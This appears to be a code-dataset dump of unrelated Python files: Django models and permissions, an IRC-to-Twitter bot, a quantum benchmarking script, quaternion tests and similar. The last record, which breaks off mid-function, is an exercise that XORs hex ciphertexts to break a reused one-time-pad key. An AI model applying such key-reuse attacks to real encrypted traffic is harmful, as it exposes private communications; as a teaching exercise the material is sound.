id (stringlengths 1-7) | text (stringlengths 6-1.03M) | dataset_id (stringclasses 1 value)
---|---|---|
23607
|
import sys
from ctypes import *
def test_getattr():
class Stuff(Union):
_fields_ = [('x', c_char), ('y', c_int)]
stuff = Stuff()
stuff.y = ord('x') | (ord('z') << 24)
if sys.byteorder == 'little':
assert stuff.x == b'x'
else:
assert stuff.x == b'z'
def test_union_of_structures():
class Stuff(Structure):
_fields_ = [('x', c_int)]
class Stuff2(Structure):
_fields_ = [('x', c_int)]
class UnionofStuff(Union):
_fields_ = [('one', Stuff),
('two', Stuff2)]
u = UnionofStuff()
u.one.x = 3
assert u.two.x == 3
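# A small self-contained sketch of why the tests above hold: a Union overlays
# all of its fields on the same memory, so writing 'y' also rewrites 'x', and
# the union is only as wide as its largest member (4 bytes here on typical
# platforms -- an assumption, not something the original tests assert).
from ctypes import Union, c_char, c_int, sizeof

class Overlay(Union):
    _fields_ = [('x', c_char), ('y', c_int)]

assert sizeof(Overlay) == sizeof(c_int)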
|
StarcoderdataPython
|
3334717
|
<reponame>gabrielaleal/pokebattle<gh_stars>1-10
from rest_framework.permissions import BasePermission, IsAuthenticated
from battles.models import Battle
class IsInBattle(BasePermission):
def has_object_permission(self, request, view, obj):
return request.user in [obj.creator, obj.opponent]
class IsBattleOpponent(BasePermission):
message = "Only battle opponent is allowed."
def has_permission(self, request, view):
battle_pk = view.kwargs.get("pk", None)
battle = Battle.objects.get(pk=battle_pk)
return request.user == battle.opponent
class BattleIsOngoing(IsAuthenticated):
message = "This battle is settled."
def has_permission(self, request, view):
battle_pk = view.kwargs.get("pk", None)
battle = Battle.objects.get(pk=battle_pk)
return battle.status == "ONGOING"
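# A minimal sketch of how these permission classes might be wired into a view.
# BattleDetailView and BattleSerializer are assumptions for illustration, not
# part of this module; permission_classes is the standard DRF hook.
#
# from rest_framework.generics import RetrieveAPIView
#
# class BattleDetailView(RetrieveAPIView):
#     queryset = Battle.objects.all()
#     serializer_class = BattleSerializer
#     permission_classes = [IsAuthenticated, IsInBattle, BattleIsOngoing]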
|
StarcoderdataPython
|
1792994
|
<gh_stars>0
# Generated by Django 3.0.4 on 2020-03-06 06:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finance', '0004_auto_20200304_1242'),
]
operations = [
migrations.CreateModel(
name='Transaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('transaction_type', models.CharField(choices=[('Credit', 'Credit'), ('Debit', 'Debit')], max_length=20)),
('wallet', models.CharField(choices=[('Mandiri', 'Mandiri'), ('BCA', 'BCA'), ('BRI', 'BRI'), ('Cash', 'Cash')], max_length=20)),
('total', models.IntegerField()),
('description', models.CharField(max_length=255)),
('spending', models.CharField(blank=True, choices=[('Donation', 'Donation'), ('Daily', 'Daily'), ('Holiday', 'Holiday')], max_length=100, null=True)),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
],
),
migrations.DeleteModel(
name='Credit',
),
migrations.DeleteModel(
name='Debit',
),
]
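# For reference, a rough sketch of the model this migration creates (an
# assumption about finance/models.py, reconstructed from the fields above):
#
# class Transaction(models.Model):
#     transaction_type = models.CharField(max_length=20, choices=[('Credit', 'Credit'), ('Debit', 'Debit')])
#     wallet = models.CharField(max_length=20, choices=[('Mandiri', 'Mandiri'), ('BCA', 'BCA'), ('BRI', 'BRI'), ('Cash', 'Cash')])
#     total = models.IntegerField()
#     description = models.CharField(max_length=255)
#     spending = models.CharField(max_length=100, blank=True, null=True, choices=[('Donation', 'Donation'), ('Daily', 'Daily'), ('Holiday', 'Holiday')])
#     created_at = models.DateTimeField(auto_now_add=True, null=True)
#     updated_at = models.DateTimeField(auto_now=True, null=True)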
|
StarcoderdataPython
|
1771991
|
from django.conf import settings
import json
def is_json(storage_field):
try:
_ = json.loads(storage_field)
return True
except:
return False
class UserFieldMixin:
"""Mixin that adds the necessary data retrieval and storage
functions to an object storing data from extra fields."""
FIELD_STRING = getattr(settings, "USER_FIELDS_ATTR_NAME", "extra_data")
def retrieve_extra_data(self, extra_field, formatted=False):
"""Function that returns the data stored for a given field."""
storage_field = getattr(self, self.FIELD_STRING)
if not is_json(storage_field):
return None
extra_data = json.loads(storage_field)
key = extra_field.name
if key not in extra_data:
return None
if formatted and extra_data[key]["type"] == "choice":
return extra_data[key]["str"]
else:
return extra_data[key]["data"]
def save_extra_data(self, extra_field, value):
"""Function that saves the data supplied for a given field to the object."""
key = extra_field.name
extra_data = {}
storage_field = getattr(self, self.FIELD_STRING)
if is_json(storage_field):
extra_data = json.loads(storage_field)
extra_data[key] = {}
if extra_field.field_type == "choice":
extra_data[key]["str"] = dict(extra_field.get_choices_tuple())[value]
extra_data[key]["data"] = value
extra_data[key]["type"] = extra_field.field_type
setattr(self, self.FIELD_STRING, json.dumps(extra_data))
self.save()
def save_extra_form_data(self, form):
"""Function that saves all of the extra field data in a form to the object."""
for extra_field in form.extra_fields:
self.save_extra_data(extra_field, form.cleaned_data[extra_field.name])
def delete_extra_data(self, extra_field):
"""Function that deletes all of the data associated with a given field."""
key = extra_field.name
storage_field = getattr(self, self.FIELD_STRING)
if is_json(storage_field):
extra_data = json.loads(storage_field)
if key in extra_data:
del extra_data[key]
setattr(self, self.FIELD_STRING, json.dumps(extra_data))
self.save()
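# A minimal usage sketch. Profile, its 'extra_data' TextField and the
# extra_field object are assumptions for illustration, not part of this module;
# the mixin only requires that the attribute named by USER_FIELDS_ATTR_NAME
# (default "extra_data") holds a JSON string.
#
# from django.db import models
#
# class Profile(UserFieldMixin, models.Model):
#     extra_data = models.TextField(blank=True, default="")
#
# profile = Profile.objects.create()
# profile.save_extra_data(extra_field, "blue")   # stores {"<field name>": {"data": "blue", "type": ...}}
# profile.retrieve_extra_data(extra_field)       # -> "blue"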
|
StarcoderdataPython
|
108136
|
<gh_stars>1-10
#!/usr/bin/python
# -*- coding: utf-8 -*-
from autonetkit.compilers.device.router_base import RouterCompiler
from autonetkit.nidb import config_stanza
class QuaggaCompiler(RouterCompiler):
"""Base Quagga compiler"""
lo_interface = 'lo:1'
def compile(self, node):
super(QuaggaCompiler, self).compile(node)
def interfaces(self, node):
"""Quagga interface compiler"""
#TODO: put this on the router base?
ipv4_node = self.anm['ipv4'].node(node)
phy_node = self.anm['phy'].node(node)
super(QuaggaCompiler, self).interfaces(node)
# OSPF cost
if phy_node.is_l3device():
node.loopback_zero.id = self.lo_interface
node.loopback_zero.description = 'Loopback'
node.loopback_zero.ipv4_address = ipv4_node.loopback
node.loopback_zero.ipv4_subnet = node.loopback_subnet
def ospf(self, node):
"""Quagga ospf compiler"""
super(QuaggaCompiler, self).ospf(node)
# add eBGP link subnets
node.ospf.passive_interfaces = []
for interface in node.physical_interfaces:
if interface.exclude_igp:
continue # don't configure IGP for this interface
bgp_int = self.anm['ebgp_v4'].interface(interface)
if bgp_int.is_bound: # ebgp interface
node.ospf.passive_interfaces.append(config_stanza(id=interface.id))
subnet = bgp_int['ipv4'].subnet
default_ebgp_area = 0
node.ospf.ospf_links.append(
config_stanza(network=subnet,
area=default_ebgp_area))
def isis(self, node):
"""Sets ISIS links
"""
g_isis = self.anm['isis']
isis_node = g_isis.node(node)
node.isis.net = isis_node.net
node.isis.process_id = isis_node.process_id
|
StarcoderdataPython
|
3250424
|
"""client.py - client for wikitweets"""
import os
import re
import sys
import random
import getopt
import logging
import logging.config
import ConfigParser
import twitter # pip install python-twitter
from twisted.words.protocols import irc
from twisted.internet import reactor, protocol
from twisted.python import log as twisted_log
from . import config
TWEET = logging.INFO + 1
logging.addLevelName(logging.INFO + 1, 'TWEET')
log = logging.getLogger(__name__)
def shorter(item):
"""Make a string shorter.
item -- a unicode string."""
if len(item) > 2:
return item[:-2] + u'\u2026' # ellipsis
return item
class EditsListener(irc.IRCClient):
"""IRC bot that listens to wikipedia edits."""
# edit message looks like this:
# u'\x0314[[\x0307Darin Erstad\x0314]]\x034 \x0310 \x0302http://en.wikipedia.org/w/index.php?diff=650841539&oldid=650491223\x03 \x035*\x03 \x0303Erik255\x03 \x035*\x03 (+2) \x0310\x03'
edit_re = re.compile(
r'^\x0314\[\[\x0307' # <grey>[[<yellow>
r'([^\x03]*)' # Article name
r'\x0314\]\]' # <grey>]]
r'\x034 \x0310 \x0302' # <?><?><blue>
r'([^\x03]*)' # Diff URI
r'\x03 \x035\*\x03 \x0303' # <red><literal *><green>
r'([^\x03]*)' # User name or IP address
)
ip_re = re.compile(
r'^([0-9]{1,3}\.){3}[0-9]{1,3}$') # TODO - IPv6
def __init__(self, cfg, twitter_api):
self.nickname = cfg.irc.nick
self.channel = cfg.irc.channel
self.articles = cfg.articles
self.message_fmt = cfg.twitter.message_fmt
self.twitter_api = twitter_api
def connectionMade(self):
irc.IRCClient.connectionMade(self)
log.info("Connected to IRC")
def connectionLost(self, reason):
irc.IRCClient.connectionLost(self, reason)
log.info("Disconnected from IRC")
# callbacks for events
def signedOn(self):
"""Called when bot has succesfully signed on to server."""
log.info('Signed on to IRC')
log.info('Joining %s', self.channel)
self.join(self.channel)
def privmsg(self, user, channel, msg):
"""This will get called when the bot receives a message."""
user = user.split('!', 1)[0]
msg = msg.decode('utf-8', 'ignore')
if user != 'rc-pmtpa':
# TODO - check for channel ops instead
return
log.debug(u"Incoming message: %r", msg)
m = self.edit_re.match(msg)
if m is None:
# IRC message was not an edit message
return
article = m.group(1)
diffuri = m.group(2)
author = m.group(3)
log.debug(u"Noticed edit of %s by %s", article, author)
if article in self.articles:
return self._tweet_edited_article(article, author, diffuri)
def _tweet_edited_article(self, article, author, diffuri):
log.info(u"[%s] edited by %s: %s", article, author, diffuri)
by_msg = 'anonymously'
if not self.ip_re.match(author):
by_msg = 'by %s' % author
# shorten if >140 chars
message_args = {
'article': article,
'author': author,
'by': by_msg,
'diffuri': u'http://t.co/XXXXXXXXXX',
}
message = self.message_fmt % message_args
while len(message) > 140:
# start truncating arguments
if len(message_args['article']) > 50:
message_args['article'] = shorter(message_args['article'])
if len(message_args['author']) > 16:
message_args['author'] = shorter(message_args['author'])
if len(message_args['by']) > 13:
message_args['by'] = shorter(message_args['by'])
shorter_message = self.message_fmt % message_args
if not len(shorter_message) < len(message):
# Impossibly long body text, time for machete
shorter_message = shorter_message[:140]
message = shorter_message
# We had to use some fake vars since twitter will mess with
# URIs, so do the actual substitution here.
message_args['diffuri'] = diffuri
message = self.message_fmt % message_args
# Do the actual tweet.
log.log(TWEET, message)
if self.twitter_api is not None:
exc = None
for i in range(3):
try:
self.twitter_api.PostUpdate(message)
break
except twitter.TwitterError, e:
log.error("Error posting to twitter (attempt %d): %s",
i + 1, e)
exc = e
else:
# TODO preserve traceback
raise exc
def alterCollidedNick(self, nickname):
"""Generate an altered version of a nickname that caused a collision
to create an unused related name for subsequent registration."""
return "%s%05d" % (nickname, random.randint(0, 2**16))
class EditsListenerFactory(protocol.ClientFactory):
"""A factory for EditsListeners.
A new protocol instance will be created each time we connect to the server.
"""
def __init__(self, cfg, twitter_api):
self.channel = cfg.irc.channel
self.cfg = cfg
self.twitter_api = twitter_api
def buildProtocol(self, addr):
proto = EditsListener(self.cfg, self.twitter_api)
proto.factory = self
return proto
def clientConnectionLost(self, connector, reason):
"""If we get disconnected, reconnect to server."""
connector.connect()
def clientConnectionFailed(self, connector, reason):
print "IRC Connection failed:", reason
reactor.stop()
def usage():
return """%s - wikipedia IRC bot that tweets certain article changes.
Usage: %s [options] <config_file>
Options:
--no-twitter Don't post to twitter, just log the tweet text
-h, --help Show this message and exit
""" % (sys.argv[0], sys.argv[0])
def main():
"""Main entry point for wikitweets"""
do_twitter = True
try:
opts, args = getopt.gnu_getopt(
sys.argv[1:], 'h', ['help', 'no-twitter'])
for o, a in opts:
if o in ('-h', '--help'):
print usage()
return 0
if o in ('--no-twitter',):
do_twitter = False
if len(args) != 1:
raise getopt.GetoptError('config file required.')
config_filename = args[0]
except getopt.GetoptError, e:
print >> sys.stderr, e
print >> sys.stderr, usage()
return 2
if not os.path.exists(config_filename):
print >> sys.stderr, "E: Config file <%s> not found" % config_filename
return 1
# initialise config and logging
try:
cfg = config.Config(config_filename)
#twisted_log.startLogging(sys.stdout)
logging.config.fileConfig(config_filename, disable_existing_loggers=False)
except ConfigParser.NoSectionError, e:
section = e.section
print >> sys.stderr, "E: Missing [%s] section in config file" % section
return 1
log.debug('Starting up')
# initialise Twitter API connection
twitter_api = None
if do_twitter:
twitter_api = twitter.Api(
consumer_key=cfg.twitter.consumer_key,
consumer_secret=cfg.twitter.consumer_secret,
access_token_key=cfg.twitter.access_token_key,
access_token_secret=cfg.twitter.access_token_secret)
user = twitter_api.VerifyCredentials()
log.info("Logged into twitter: %s", user)
# create factory protocol and application
f = EditsListenerFactory(cfg, twitter_api)
# connect factory to this host and port
reactor.connectTCP(cfg.irc.server, cfg.irc.port, f)
# run bot
reactor.run()
if __name__ == '__main__':
sys.exit(main())
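# For reference, what edit_re extracts from the sample IRC line shown in the
# EditsListener comment above:
#   group(1) -> u'Darin Erstad'        (article name)
#   group(2) -> u'http://en.wikipedia.org/w/index.php?diff=650841539&oldid=650491223'
#   group(3) -> u'Erik255'             (editing user)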
|
StarcoderdataPython
|
57298
|
<filename>exs/mundo_3/python/089.py
"""
Desafio 089
Problema: Crie um programa que leia nome e duas notas de vários alunos
e guarde tudo em uma lista composta. No final, mostre um
boletim contendo a média de cada um e permita que o usuário
possa mostrar as notas de cada aluno individualmente.
Resolução do problema:
"""
historicoAlunos = []
dadosAluno = []
while True:
dadosAluno.append(input('NOME: ').strip().capitalize())
dadosAluno.append([float(input('NOTA 1: ')), float(input('NOTA 2: '))])
# Grades below 0 or above 10 are invalid, so ask for them again in that case
while (dadosAluno[1][0] < 0 or dadosAluno[1][0] > 10) or (dadosAluno[1][1] < 0 or dadosAluno[1][1] > 10):
print('-' * 25)
print('Nota inválida, informe notas de 0 a 10...')
dadosAluno[1].clear()  # Discard the invalid grades
print(f'NOME: {dadosAluno[0]}')
dadosAluno[1].append(float(input('NOTA 1: ')))
dadosAluno[1].append(float(input('NOTA 2: ')))
historicoAlunos.append(dadosAluno[:])  # Append a full copy
dadosAluno.clear()  # Clear the temporary data list
print('-' * 25)
continuar = input('Continuar [S/N]: ').strip().upper()
# If an invalid option is entered, keep looping until a valid one is given
while continuar not in ('S', 'N'):
print('\nInforme a opção corretamente...')
continuar = input('Continuar [S/N]: ').strip().upper()
print('-' * 25)
if continuar == 'N':
print('\n')
print('+------------------------------+' + f'\n|{"MÉDIAS":^30}|\n' + '+-----+----------------+-------+')
break
for idx, nome in enumerate(historicoAlunos):
if idx == 0:
# Format the table header
print(f'| {"ID":<4}| {"NOME":<15}| {"MÉDIA":<6}|\n' + '+-----+----------------+-------+')
media = (historicoAlunos[idx][1][0] + historicoAlunos[idx][1][1]) / 2
print(f'| {idx:<4}| {historicoAlunos[idx][0]:<15}| {media:<6.1f}|')  # Table row
print('+-----+----------------+-------+')
while True:
id_aluno = int(input('\nID DO ALUNO ou (999 para sair): '))
while 0 > id_aluno or id_aluno > len(historicoAlunos) - 1 and id_aluno != 999:
print('~' * 37)
print('\nInforme um ID correto...')
id_aluno = int(input('ID DO ALUNO ou (999 para sair): '))
print('-' * 37)
if id_aluno == 999:
print('\nPrograma finalizado...')
break
print(f'Aluno(a): {historicoAlunos[id_aluno][0]}\nNotas: {historicoAlunos[id_aluno][1]}')
print('-' * 37)
|
StarcoderdataPython
|
1716835
|
import base64
class FileReader(object):
def __init__(self, file_path):
with open(file_path, 'rb') as filedata:
self.raw_data = base64.b64encode(filedata.read())
self.raw_data = self.raw_data.replace("=", "")
def sanitize(self, char):
my_ord = ord(char)
return str(my_ord).zfill(3)
def read(self, chunk_size):
for i in xrange(0, len(self.raw_data), chunk_size):
yield ''.join(map(self.sanitize, self.raw_data[i:i+chunk_size]))
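# A minimal usage sketch (Python 2, since the class relies on xrange and
# str-typed base64 output); 'example.bin' is a placeholder path, not part of
# the original:
#
# reader = FileReader('example.bin')
# for chunk in reader.read(16):
#     print chunk   # each chunk is a run of zero-padded 3-digit ordinals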
|
StarcoderdataPython
|
1658441
|
import sys
sys.path.insert(0, '../utils')
import ioManager
import new
sys.path.insert(0, '../connectors')
import transport
sys.path.insert(0,'../sequential')
import ff
inputS = transport.wires(1)
inputR = transport.wires(1)
out = transport.wires(2)
clock = transport.wires(1)
hware = ff.SRFlipFlop(inputS,inputR,out,clock)
iohandler = ioManager.StringIO(hware)
print iohandler.input('0','1','1')
|
StarcoderdataPython
|
3320237
|
<gh_stars>10-100
"""
#Create set of pulses for single qubit randomized benchmarking sequence.
Created on Tue Feb 07 15:01:37 2012
@authors: <NAME>, <NAME>, and <NAME>
"""
import numpy as np
from scipy.linalg import expm
from scipy.constants import pi
from functools import reduce
from itertools import permutations
from random import choice
import csv
def memoize(function):
cache = {}
def decorated(*args):
if args not in cache:
cache[args] = function(*args)
return cache[args]
return decorated
@memoize
def clifford_multiply(C1, C2):
'''
Multiplication table for single qubit cliffords. Note this assumes C1 is applied first.
'''
tmpMult = np.dot(Cliffs[C2].matrix,Cliffs[C1].matrix)
checkArray = np.array([np.abs(np.trace(np.dot(tmpMult.transpose().conj(),Cliffs[x].matrix))) for x in range(24)])
return checkArray.argmax()
#Number of gates that we want
# gateLengths = np.array([2, 4, 8, 12, 16, 24, 32, 48, 64, 80, 96])
# gateLengths = np.array([2, 4, 8, 12, 16, 24, 32, 48, 64, 96])
# gateLengths = np.array([4, 8, 12, 16, 24, 32, 64, 128, 192])
gateLengths = np.array([4, 8, 16, 24, 32, 64, 128, 192])
#Number of randomizations
numRandomizations = 36
#Single qubit paulis
X = np.array([[0, 1],[1, 0]])
Y = np.array([[0, -1j],[1j, 0]])
Z = np.array([[1, 0],[0, -1]]);
I = np.eye(2)
#Basically a structure to contain some info about the Cliffords
class Clifford(object):
def __init__(self, matrix, inverse, shapeName, shapePhase):
self.matrix = matrix
self.inverse = inverse
self.shapeName = shapeName
self.shapePhase = shapePhase
#Basis Cliffords
Cliffs = {}
Cliffs[0] = Clifford(I, 0, 'QId', None)
Cliffs[1] = Clifford(expm(-1j*(pi/4)*X), 3, 'R90', 0)
Cliffs[2] = Clifford(expm(-2j*(pi/4)*X), 2, 'R180', 0)
Cliffs[3] = Clifford(expm(-3j*(pi/4)*X), 1, 'R90', 0.5)
Cliffs[4] = Clifford(expm(-1j*(pi/4)*Y), 6, 'R90', 0.25)
Cliffs[5] = Clifford(expm(-2j*(pi/4)*Y), 5, 'R180', 0.25)
Cliffs[6] = Clifford(expm(-3j*(pi/4)*Y), 4, 'R90', 0.75)
Cliffs[7] = Clifford(expm(-1j*(pi/4)*Z), 9, 'QId', None)
Cliffs[8] = Clifford(expm(-2j*(pi/4)*Z), 8, 'QId', None)
Cliffs[9] = Clifford(expm(-3j*(pi/4)*Z), 7, 'QId', None)
Cliffs[10] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(X+Y)), 10, 'R180', 0.125)
Cliffs[11] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(X-Y)), 11, 'R180', -0.125)
Cliffs[12] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(X+Z)), 12, 'RXpZ', 0)
Cliffs[13] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(X-Z)), 13, 'RXpZ', 0.5)
Cliffs[14] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(Y+Z)), 14, 'RXpZ', 0.25)
Cliffs[15] = Clifford(expm(-1j*(pi/2)*(1/np.sqrt(2))*(Y-Z)), 15, 'RXpZ', 0.75)
Cliffs[16] = Clifford(expm(-1j*(pi/3)*(1/np.sqrt(3))*(X+Y+Z)), 17, 'RXpYpZ', 0)
Cliffs[17] = Clifford(expm(-2j*(pi/3)*(1/np.sqrt(3))*(X+Y+Z)), 16, 'RXpYmZ', 0.5)
Cliffs[18] = Clifford(expm(-1j*(pi/3)*(1/np.sqrt(3))*(X-Y+Z)), 19, 'RXpYpZ', -0.25)
Cliffs[19] = Clifford(expm(-2j*(pi/3)*(1/np.sqrt(3))*(X-Y+Z)), 18, 'RXpYmZ', 0.25)
Cliffs[20] = Clifford(expm(-1j*(pi/3)*(1/np.sqrt(3))*(X+Y-Z)), 21, 'RXpYmZ', 0)
Cliffs[21] = Clifford(expm(-2j*(pi/3)*(1/np.sqrt(3))*(X+Y-Z)), 20, 'RXpYpZ', 0.5)
Cliffs[22] = Clifford(expm(-1j*(pi/3)*(1/np.sqrt(3))*(-X+Y+Z)), 23, 'RXpYpZ', 0.25)
Cliffs[23] = Clifford(expm(-2j*(pi/3)*(1/np.sqrt(3))*(-X+Y+Z)), 22, 'RXpYmZ', -0.25)
# Clifford subset (convert 1-based indexing from MATLAB to 0-based indexing)
CliffordSubset = [x-1 for x in [1, 3, 6, 9, 17, 18, 19, 20, 21, 22, 23, 24]]
#Generate random sequences
# randomSeqs = [np.random.randint(0,24, (gateLength-1)).tolist() for gateLength in gateLengths for ct in range(numRandomizations) ]
randomSeqs = [[choice(CliffordSubset) for _ in range(gateLength)] for gateLength in gateLengths for ct in range(numRandomizations) ]
#Interleave a gate
# interleaveGate = 12 #Hadamard
# randomSeqs = [np.vstack((randomSeq, interleaveGate*np.ones(len(randomSeq), dtype=np.int))).flatten(order='F').tolist() for randomSeq in randomSeqs]
#For each sequence calculate inverse and append the final Clifford
randomISeqs = []
for seq in randomSeqs:
totalCliff = reduce(clifford_multiply, seq)
inverseCliff = Cliffs[totalCliff].inverse
randomISeqs.append(seq + [inverseCliff])
#Write out the files now
with open('RB_ISeqs12.txt','wb') as ISeqFID:
writer = csv.writer(ISeqFID)
writer.writerows(randomISeqs)
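# A small standalone check of the inverse bookkeeping above: Cliffs[1] is the
# X 90-degree rotation and Cliffs[3] (listed as its inverse) the X 270-degree
# rotation, so their product is the identity up to a global phase.
check = np.dot(Cliffs[3].matrix, Cliffs[1].matrix)
assert np.isclose(np.abs(np.trace(check)), 2)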
|
StarcoderdataPython
|
3257777
|
<gh_stars>1-10
# coding=utf-8
import modelscript.scripts.demo.parser
import modelscript.scripts.demo.printer
|
StarcoderdataPython
|
1626939
|
<reponame>kaixin-bai/walle
"""Tests for the Orientation class.
"""
import numpy as np
import pytest
from walle.core import Orientation, UnitQuaternion, Quaternion
class TestOrientation(object):
def axis_angle_vector(self, deg):
theta = np.deg2rad(deg)
unit_vec = np.array([0, 0, 1])
return unit_vec, theta
def rotation_vector(self, deg):
unit_vec, theta = self.axis_angle_vector(deg)
return theta * unit_vec
def quat_from_axang(self, deg):
unit_vec, theta = self.axis_angle_vector(deg)
s = np.cos(theta / 2)
v = unit_vec * np.sin(theta / 2)
return UnitQuaternion(s, v)
def test_init_empty(self):
"""Tests that the default constructor returns an identity quaternion.
"""
ori = Orientation()
actual = ori._quat
expected = UnitQuaternion()
assert actual == expected
def test_init_rot_vec_valid_arr(self):
"""Tests orientation init with rotation vector ndarray.
"""
rot_vec = self.rotation_vector(90)
ori = Orientation(rot_vec)
actual_axis, actual_theta = ori._quat.axis_angle
expected_axis, expected_theta = np.array([0, 0, 1]), np.deg2rad(90)
assert np.allclose(actual_axis, expected_axis) and np.isclose(actual_theta, expected_theta)
def test_init_rot_vec_valid_list(self):
"""Tests orientation init with rotation vector list.
"""
rot_vec = self.rotation_vector(90).tolist()
ori = Orientation(rot_vec)
actual_axis, actual_theta = ori._quat.axis_angle
expected_axis, expected_theta = np.array([0, 0, 1]), np.deg2rad(90)
assert np.allclose(actual_axis, expected_axis) and np.isclose(actual_theta, expected_theta)
def test_init_rot_vec_invalid_list(self):
"""Tests orientation init with invalid rotation vector list.
"""
rot_vec = self.rotation_vector(90).tolist()
rot_vec = [rot_vec[0], rot_vec[1], [rot_vec[2]]]
with pytest.raises(ValueError):
Orientation(rot_vec)
def test_init_rot_vec_invalid_arr(self):
"""Tests orientation init with invalid rotation vector ndarray.
"""
rot_vec = np.random.randn(4)
with pytest.raises(ValueError):
Orientation(rot_vec)
def test_init_axisang_valid_ndarray_float(self):
"""Test orientation with valid axis-angle (ndarray, float).
"""
expected_axis, expected_theta = self.axis_angle_vector(90)
ori = Orientation(expected_axis, expected_theta)
actual_axis, actual_theta = ori._quat.axis_angle
assert np.allclose(actual_axis, expected_axis) and np.isclose(actual_theta, expected_theta)
def test_init_axisang_valid_list_float(self):
"""Test orientation with valid axis-angle (list, float).
"""
expected_axis, expected_theta = self.axis_angle_vector(90)
expected_axis = expected_axis.tolist()
ori = Orientation(expected_axis, expected_theta)
actual_axis, actual_theta = ori._quat.axis_angle
assert np.allclose(actual_axis, expected_axis) and np.isclose(actual_theta, expected_theta)
def test_init_axisang_invalid(self):
"""Test orientation with invalid axis-angle initialization.
"""
with pytest.raises(ValueError):
Orientation([1, 2, 3, 4], 0)
def test_quaternion_rot_from_to_quat(self):
"""Tests the quaternion that rotates `from_quat` to `to_quat`.
"""
quat_from = UnitQuaternion.random()
quat_to = UnitQuaternion.random()
rotation = Orientation.from_quats(quat_from, quat_to)
actual = (rotation * quat_from).quat
expected = quat_to
assert actual == expected
def test_quaternion_rot_from_to_vec_identity(self):
"""Tests the quaternion that rotates a vector to itself.
Should return the identity quaternion [1, 0, 0, 0].
"""
x = np.array([1, 0, 0])
quat = Orientation.from_vecs(x, x).quat
assert quat.is_identity()
def test_quaternion_rot_from_to_vec_random(self):
"""Tests the quaternion that rotates a vector to another.
"""
x = np.random.randn(3)
quat = UnitQuaternion.random()
y = quat * x
expected = y
actual = Orientation.from_vecs(x, y) * x
assert np.allclose(actual, expected)
|
StarcoderdataPython
|
3298071
|
DATABASE_NAME = '{{cookiecutter.project_name}}'
DATABASE_USER = 'user'
DATABASE_PASSWORD = 'password'
DATABASE_HOST = 'database'
DEBUG = True
|
StarcoderdataPython
|
1753332
|
cts = [
'<KEY>',
'<KEY>',
'32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb',
'32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa',
'3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070',
'32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4',
'32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce',
'315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3',
'271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027',
'466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83',
]
target = '32510ba9babebbbefd001547a810e67149caee11d945cd7fc81a05e9f85aac650e9052ba6a8cd8257bf14d13e6f0a803b54fde9e77472dbff89d71b57bddef121336cb85ccb8f3315f4b52e301d16e9f52f904'
def str_xor(a, b):
if len(a) > len(b):
return ''.join([hex(ord(x) ^ ord(y))[2:] for (x, y) in zip(a[:len(b)], b)])
else:
return ''.join([hex(ord(x) ^ ord(y))[2:] for (x, y) in zip(a, b[:len(a)])])
def hex_xor(a, b):
if len(a) > len(b):
return ''.join([hex(int(x, 16) ^ int(y, 16))[2:] for (x, y) in zip(a[:len(b)], b)])
else:
return ''.join([hex(int(x, 16) ^ int(y, 16))[2:] for (x, y) in zip(a, b[:len(a)])])
def split_byte(hex_str):
return [hex_str[i:i+2] for i in range(0, len(hex_str), 2)]
def show_ascii(hex_str):
x = int(hex_str, 16)
if (ord('a') <= x <= ord('z')) or (ord('A') <= x <= ord('Z')):
return chr(x)
else:
